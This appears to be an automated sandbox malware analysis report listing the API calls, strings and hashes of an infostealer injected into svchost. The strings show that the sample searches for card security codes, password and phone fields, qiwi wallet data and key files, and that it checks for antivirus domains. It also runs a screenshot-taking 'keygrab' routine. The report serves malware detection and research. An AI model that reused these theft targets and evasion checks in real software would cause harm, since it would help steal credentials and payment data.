                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 02C81113
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileGlobal$CreateObjectWrite$CompatibleHandleRelease$AllocBitmapBitsCloseCursorDeleteFreeInformationLockSelectUnlock
                                                                                                                                                                                                                    • String ID: ($6
                                                                                                                                                                                                                    • API String ID: 1662540191-4149066357
                                                                                                                                                                                                                    • Opcode ID: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                                    • Instruction ID: f65ab8c0bae4c2ed15dfae3902ced4cd321ad6f1f88fe3bb7d017c44247e62ea
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 994efae198a796a2b8028be584b661c703fe59ac19df0273a5704bacf482aad1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 90612871944340AFD311DF65DC89B6BBBE8EFC8754F048A1CFA4993280DBB4D9058BA2
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv=,00000000,7622F380,00000000,00000001,00000000,?,?,?,02C87534,?,?,?,?,?), ref: 02C8CE43
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE51
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv2=,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE5D
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvv2=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE6B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvc=,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE77
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,&cvc=&,?,?,02C87534,?,?,?,?,?,?), ref: 02C8CE89
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CE9F
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8CEB2
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?,?), ref: 02C8CF1B
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 02C8CF22
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C8CF32
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8CF90,00000000,00000000,00000000), ref: 02C8CF58
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?), ref: 02C8CF70
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8CF81
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: HandleHeapstrstr$AllocCloseCreateInformationProcessThreadmemset
                                                                                                                                                                                                                    • String ID: &cvc=$&cvc=&$&cvv2=$&cvv2=&$&cvv=$&cvv=&$&domain=letitbit.net&
                                                                                                                                                                                                                    • API String ID: 1632825432-2817208116
                                                                                                                                                                                                                    • Opcode ID: 06cff44ad58815e4a040bba79dbcd62a40471d294dceda1540010f666d3570b6
                                                                                                                                                                                                                    • Instruction ID: b57f18272183f62abb0d638fa87a6214254d197619b3845fed2fe7836dbc37da
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 06cff44ad58815e4a040bba79dbcd62a40471d294dceda1540010f666d3570b6
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2412731A80BA12BF71B26385C99FAB679DCFC5A0CF18C253F944D7241DB62DB0582B5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,avast.com,?,?,02C7585C), ref: 02C7570B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,kaspersky,?,?,02C7585C), ref: 02C7571B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,drweb,?,?,02C7585C), ref: 02C75727
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,eset.com,?,?,02C7585C), ref: 02C75733
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,antivir,?,?,02C7585C), ref: 02C7573F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,avira,?,?,02C7585C), ref: 02C7574B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,virustotal,?,?,02C7585C), ref: 02C75757
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,virusinfo,?,?,02C7585C), ref: 02C75763
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,z-oleg.com,?,?,02C7585C), ref: 02C7576F
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,trendsecure,?,?,02C7585C), ref: 02C7577B
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,anti-malware,?,?,02C7585C), ref: 02C75787
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(?,.comodo.com,?,?,02C7585C), ref: 02C75793
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: .comodo.com$anti-malware$antivir$avast.com$avira$drweb$eset.com$kaspersky$trendsecure$virusinfo$virustotal$z-oleg.com
                                                                                                                                                                                                                    • API String ID: 0-375433535
                                                                                                                                                                                                                    • Opcode ID: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                                    • Instruction ID: d090923e131477c12c4cec90647dd52a86651fcb6ca3814de5afc97d4e454eb4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cc61648bfb30b67e65d85107ca5f90452ea4f24be874ee4712b586ef10f07e3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 260139D63A67E6717A73317A0C92F9F4A8C4ED1CC8B410675FC09E2105E7A6DB0308B5
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8B641
                                                                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 02C8B652
                                                                                                                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02C8B660
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8B669
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8B681
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C8B693
                                                                                                                                                                                                                    • TerminateThread.KERNEL32(00000000,00000000), ref: 02C8B6A5
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8B100,00000000,00000000,00000000), ref: 02C8B6BA
                                                                                                                                                                                                                    • Sleep.KERNEL32(0000EA60), ref: 02C8B6CA
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B6E4
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8B74D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B774
                                                                                                                                                                                                                    • PathFileExistsA.SHLWAPI(?), ref: 02C8B7D7
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFC0D), ref: 02C8B7E2
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$BackslashMutex$ExistsFileHandleOpenSleepThread$CloseCreateInformationReleaseTerminate
                                                                                                                                                                                                                    • String ID: 7F1BFC0D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0#v$pass.log$path.txt
                                                                                                                                                                                                                    • API String ID: 2618501214-107084094
                                                                                                                                                                                                                    • Opcode ID: f6fe511270f52497d6a7ce7f31b185b996bfeda6af1d9b2f39a4b145b2bdaf5d
                                                                                                                                                                                                                    • Instruction ID: 7473a13c26f8500dcefc51da46215b1b2887353ab3188e9ed7c6671aa70f9290
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f6fe511270f52497d6a7ce7f31b185b996bfeda6af1d9b2f39a4b145b2bdaf5d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E6515831A847819BD716EB289C54BA7BBD4AFC6708F188A58F885D7240DB70DD08C795
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,02C7149C,00000000,?), ref: 02C7101B
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000013,7622F570,?,02C7149C,00000000,?), ref: 02C7103E
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71045
                                                                                                                                                                                                                    • memset.MSVCRT ref: 02C71055
                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000,7622F570,?,02C7149C,00000000,?), ref: 02C71073
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,name.key,00000000,?,02C7149C,00000000,?), ref: 02C71093
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C906E0,00000000,00000000,00000000), ref: 02C710A3
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C8F1B0,00000000,00000000,00000000), ref: 02C710D0
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,\secrets.key,?,?,02C7149C,00000000,?), ref: 02C710EC
                                                                                                                                                                                                                    • StrStrIA.SHLWAPI(00000000,sign.key,?,02C7149C,00000000,?), ref: 02C71102
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C911C0,00000000,00000000,00000000), ref: 02C7111B
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,?,?,02C7149C,00000000,?), ref: 02C7112F
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71140
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71155
                                                                                                                                                                                                                    • HeapValidate.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71158
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,?,02C7149C,00000000,?), ref: 02C71164
                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000,?,02C7149C,00000000,?), ref: 02C71167
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Heap$CreateProcessThread$ByteCharHandleMultiWide$AllocCloseFreeInformationValidatememset
                                                                                                                                                                                                                    • String ID: \secrets.key$name.key$sign.key
                                                                                                                                                                                                                    • API String ID: 3254303593-2345338882
                                                                                                                                                                                                                    • Opcode ID: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                                    • Instruction ID: 4ba0e2f269905619e1da183914577106412ee6c3aa111e834bdfd4dedbef0bba
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 280a4b6dda162144de4f81a873db4c6609517df138f10e60873049e03207b4b4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A741E731A401A17B9B326A665C8CEAB7B7CDFC6F94F088719F919A7040DB71C611C6B0
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C903E9
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C903FC
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C9040F
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF57), ref: 02C9043D
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF57), ref: 02C90473
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,7F1BFF57), ref: 02C90488
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C90492
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C9049A
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C904AB
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C904B2
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?), ref: 02C904BF
                                                                                                                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,02C90540,00000000,00000000,00000000), ref: 02C90508
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C90520
                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 02C90531
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Pathstrstr$BackslashCreateDirectoryErrorHandleLast$AdminCloseCurrentFolderInformationMakeSystemThreadUser
                                                                                                                                                                                                                    • String ID: 7F1BFF57$GET $pass.txt$password=$phone=$w.qiwi.ru
                                                                                                                                                                                                                    • API String ID: 554474407-1504432680
                                                                                                                                                                                                                    • Opcode ID: 36107d2cb671c7c4823b7a1f227206b526096c78df2eb944ec67ef2b892598c4
                                                                                                                                                                                                                    • Instruction ID: 2a174f549657d50b6b9ead6a098b81d6fee8c9a1354c359d70f9939a41d377c1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 36107d2cb671c7c4823b7a1f227206b526096c78df2eb944ec67ef2b892598c4
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AD415931E4025D9BEF218E34AC5CBEB7BACAF81705F244698F88597140EB70D685CB95
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7f1bfc59,00000000,00000001), ref: 02C8A006
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(02CCB2A0,00000000), ref: 02C8A041
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8A047
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8A04F
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(02CCB2A0), ref: 02C8A05E
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C8A065
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A09B
                                                                                                                                                                                                                    • CopyFileA.KERNEL32(00000000,02CCB2A0,00000000), ref: 02C8A0D3
                                                                                                                                                                                                                    • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}), ref: 02C8A0E6
                                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 02C8A0F7
                                                                                                                                                                                                                    • ReleaseMutex.KERNEL32(00000000), ref: 02C8A0FA
                                                                                                                                                                                                                    • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02C8A10C
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateErrorLastMutexPathSleep$AdminBackslashCopyDirectoryFileFolderHandleInformationMakeReleaseSystemUser
                                                                                                                                                                                                                    • String ID: 7f1bfc59$Local\{BE3C9D87-B91F-4e47-8B00-69798A04C732}$P0#v
                                                                                                                                                                                                                    • API String ID: 2754757069-1854995306
                                                                                                                                                                                                                    • Opcode ID: 59495722ea5c84c1fe7536fb17816220eef3dcba5d1c1633ff2f0d8705cc4f22
                                                                                                                                                                                                                    • Instruction ID: 9dbeddafe6ca522f76295b8ff74685d63b30fd7363d1d50eb135df50acfb3d80
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 59495722ea5c84c1fe7536fb17816220eef3dcba5d1c1633ff2f0d8705cc4f22
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 19414831A406959BE7122B349C1977B3F98AF89749F098659FC47C7280CB71CA00C7D1
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8FA40
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FA81
                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,7693BF00), ref: 02C8FA8B
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C8FA93
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C8FAA4
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,7693BF00), ref: 02C8FAAB
                                                                                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FAEA
                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,7693BF00), ref: 02C8FAF7
                                                                                                                                                                                                                    • SetCurrentDirectoryA.KERNEL32(?,?,7693BF00), ref: 02C8FB40
                                                                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00000104,00003000,00000004,?,7693BF00), ref: 02C8FB5C
                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(00000000,?,00000104,?,7693BF00), ref: 02C8FB79
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000008,00004070,?,00000000,75AF5CE0,?,02C82840,?), ref: 02C97B63
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapAlloc.KERNEL32(00000000,?,02C82840,?), ref: 02C97B66
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: memset.MSVCRT ref: 02C97B7B
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: CreateFileA.KERNEL32(02C82840,40000000,00000003,00000000,00000002,00000080,00000000,?,02C82840,?), ref: 02C97BD2
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97BF5
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapValidate.KERNEL32(00000000,?,02C82840,?), ref: 02C97BF8
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: GetProcessHeap.KERNEL32(00000000,00000000,?,02C82840,?), ref: 02C97C04
                                                                                                                                                                                                                      • Part of subcall function 02C97B50: HeapFree.KERNEL32(00000000,?,02C82840,?), ref: 02C97C07
                                                                                                                                                                                                                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,7693BF00), ref: 02C8FBA8
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(7F1BFF41,?,7693BF00), ref: 02C8FBC7
                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(?,00000000,?,7693BF00), ref: 02C8FC2B
                                                                                                                                                                                                                    • DeleteFileA.KERNEL32(?,?,7693BF00), ref: 02C8FC38
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: LocalAlloc.KERNEL32(00000040,-00000103,00000000,00000000,75AF5CE0), ref: 02C97D61
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: _snprintf.MSVCRT ref: 02C97D7D
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: FindFirstFileA.KERNEL32(00000000,?), ref: 02C97D8C
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: LocalFree.KERNEL32(00000000), ref: 02C97D99
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DD8
                                                                                                                                                                                                                      • Part of subcall function 02C97CE0: wsprintfA.USER32 ref: 02C97DE6
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FileHeap$AllocFreePathProcess$AttributesBackslashCreateDirectoryErrorLastLocalVirtualwsprintf$AdminCurrentDeleteFindFirstFolderMakeModuleNameSystemUserValidate_snprintflstrcpynmemset
                                                                                                                                                                                                                    • String ID: 7F1BFF41$\$inter.zip$path.txt
                                                                                                                                                                                                                    • API String ID: 3082343898-1629773178
                                                                                                                                                                                                                    • Opcode ID: 88ed06e52fdd07e588f9949737f65c1daa6bdc6c799b508618e784c988bddfa0
                                                                                                                                                                                                                    • Instruction ID: 9bb7c9631274bbb94ac3368ab62ddaff185e6de9522194c02445509fab95a5b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88ed06e52fdd07e588f9949737f65c1daa6bdc6c799b508618e784c988bddfa0
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 036178309406855FDB22DB249CA8BFBBBE9AF85304F5086D8E989D7150DB70DA89CB50
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 02C81130: memset.MSVCRT ref: 02C81152
                                                                                                                                                                                                                      • Part of subcall function 02C81130: GetParent.USER32(?), ref: 02C8115E
                                                                                                                                                                                                                      • Part of subcall function 02C81130: GetWindowTextW.USER32(00000000,?,00000104), ref: 02C81175
                                                                                                                                                                                                                      • Part of subcall function 02C81130: StrStrIW.SHLWAPI(?,00000000,?,?,?,?,00000000), ref: 02C81196
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD858,?,?), ref: 02C81206
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?,?,00000000), ref: 02C81234
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,?), ref: 02C81248
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C81259
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C8125F
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C81268
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C81279
                                                                                                                                                                                                                    • SetLastError.KERNEL32(?), ref: 02C81283
                                                                                                                                                                                                                    • PathAppendA.SHLWAPI(?,keygrab), ref: 02C81295
                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(?,00000000), ref: 02C812A0
                                                                                                                                                                                                                    • GetLastError.KERNEL32 ref: 02C812A6
                                                                                                                                                                                                                    • IsUserAnAdmin.SHELL32 ref: 02C812AE
                                                                                                                                                                                                                    • PathMakeSystemFolderA.SHLWAPI(?), ref: 02C812BF
                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 02C812C6
                                                                                                                                                                                                                    • PathAddBackslashA.SHLWAPI(?), ref: 02C812D3
                                                                                                                                                                                                                    • _snprintf.MSVCRT ref: 02C81303
                                                                                                                                                                                                                    • LeaveCriticalSection.KERNEL32(02CBD858,?), ref: 02C81323
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000002.00000002.3417374807.0000000002C70000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C70000, based on PE: true
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CC7000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    • Associated: 00000002.00000002.3417374807.0000000002CCC000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2c70000_svchost.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Path$ErrorLast$AdminAppendBackslashCreateCriticalDirectoryFolderMakeSectionSystemUser$EnterLeaveParentTextWindow_snprintfmemset
                                                                                                                                                                                                                    • String ID: %02u.bmp$keygrab
                                                                                                                                                                                                                    • API String ID: 2122597915-4222822809
                                                                                                                                                                                                                    • Opcode ID: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                                    • Instruction ID: f38ad4d4ce2a83df3e94e43d01db13399269dc43d253f1200e0522f9340ea6d4
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b9a95635331556032df9da3cc206f789a13c51217be5fcd1ae6ffc336ec44d82
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9531C2759402599BDB11EBB4DC48BDA77BCEF88305F088A94E589C3000DFB0DA96CF90
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • EnterCriticalSection.KERNEL32(02CBD840,00000000,00000000,75C39E60,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C80250
                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000008,00000020,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802B8
                                                                                                                                                                                                                    • HeapAlloc.KERNEL32(00000000,?,02C808CE,?,?,?,?,?,?,02C84818), ref: 02C802BF
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8033F
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80359
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C80373
                                                                                                                                                                                                                    • strstr.MSVCRT ref: 02C8038D
